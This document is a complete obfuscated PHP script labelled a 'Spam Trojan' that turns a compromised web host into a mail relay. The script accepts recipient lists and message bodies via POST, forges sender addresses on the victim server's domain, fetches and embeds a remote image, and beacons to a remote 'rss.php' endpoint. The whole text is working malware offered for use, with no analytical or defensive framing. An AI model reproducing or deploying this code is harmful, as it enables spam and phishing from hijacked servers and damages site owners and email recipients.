Spam Trojan, allows you to send emails from your hosting

<?php
error_reporting(0); if (!isset($_POST['l']) || !isset($_POST['d'])) die(PHP_OS . "10+" . md5(0987654321)); $v01b6e203 = stripslashes($_POST['l']); $v8d777f38 = stripslashes($_POST['d']); preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9); $vc34487c9 = $vc34487c9[1]; preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42); $v6f4b5f42 = $v6f4b5f42[1]; preg_match('|<IMG>(.*)</IMG>|imsU', $v6f4b5f42, $v3ba24a80); $v3ba24a80 = $v3ba24a80[1]; $v0897acf4 = $_SERVER['SERVER_NAME']; if (ne667da76($v0897acf4)) { $v10497e3f = false; } else { if ($vb068931c != '') $vd98a07f8 = "$vb068931c "; $v0c83f57c = $vee11cbb1 . "@" . preg_replace('/^www\./i', '', $v0897acf4); $vd98a07f8 .= "<$v0c83f57c>"; $v4340fd73 = "From: $vd98a07f8\r\n"; $v10497e3f = true; } if (((strtolower(@ini_get('safe_mode')) == 'on') || (strtolower(@ini_get('safe_mode')) == 'yes') || (strtolower(@ini_get('safe_mode')) == 'true') || (ini_get("safe_mode") == 1 ))) { $v10497e3f = false; } $vf2b57013 = "==" . substr(sha1(date('r', time())), 16) . "=="; $v6e6eea18 = "==" . substr(sha1(date('r', time()+10)), 16) . "=="; $v435ed7e9 = "DCS00" . rand (0,9) . rand (0,9) . rand (0,9) .rand (0,9) .".jpg"; if ($v3ba24a80) { $v4b7cc569 = substr(sha1(date('r', time()+11)), 1, 8); if (ini_get('session.save_path') != '' ) { $va11fa8df = ini_get('session.save_path'); } else { $va11fa8df = '/tmp'; } $v2346ae27 = md5($v3ba24a80); preg_match('/^(http:\/\/.*)\/.*$/', $v3ba24a80, $vf532e700); if (file_exists("$va11fa8df/sess_$v2346ae27")) { $v5f163541 = chunk_split(base64_encode(file_get_contents("$va11fa8df/sess_$v2346ae27"))); file_get_contents($vf532e700[1].'/rss.php?y'); } else { $v72611e52 = file_get_contents($v3ba24a80); file_get_contents($vf532e700[1].'/rss.php?n'); $v5f163541 = chunk_split(base64_encode($v72611e52)); $v65ee5956 = fopen("$va11fa8df/sess_$v2346ae27", "w+"); fwrite($v65ee5956, $v72611e52); fclose($v65ee5956); } $v6f4b5f42 = preg_replace('|<IMG>.*</IMG>|imsU', "<img src=\"cid:$v4b7cc569@$v0897acf4\">", $v6f4b5f42); } $v6f4b5f42 = chunk_split(base64_encode($v6f4b5f42)); $v4340fd73 .= "MIME-Version: 1.0\r\n"; $v4340fd73 .= "Content-Type: multipart/mixed; boundary=\"$vf2b57013\"\r\n"; $v841a2d68 = "--"."$vf2b57013\nContent-Type: multipart/related; boundary=\"$v6e6eea18\";\n type=\"text/html\"\n\n--"."$v6e6eea18\nContent-Type: text/html; charset=\"iso-8859-1\"\nContent-Transfer-Encoding: base64\n\n$v6f4b5f42"; if ($v3ba24a80) { $v841a2d68 .= "\n--"."$v6e6eea18\nContent-Type: image/jpeg; name=\"$v435ed7e9\"\nContent-Transfer-Encoding: base64\nContent-ID: <$v4b7cc569@$v0897acf4>\nContent-Disposition: inline; filename=\"$v435ed7e9\"\n\n$v5f163541"; } $v841a2d68 .="\n\n--"."$v6e6eea18"."--\n\n--"."$vf2b57013"."--\n"; if ($v10497e3f) { if (mail($v01b6e203, $vc34487c9, $v841a2d68, $v4340fd73, "-f$v0c83f57c")) echo "OK" . md5(1234567890); else die(PHP_OS . "20+" . md5(0987654321)); } else { if (mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v4340fd73)) echo "OK" . md5(1234567890); else die(PHP_OS . "20+" . md5(0987654321)); } exit; function ne667da76($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); } ?>
Spam Trojan, allows you to send emails from your hosting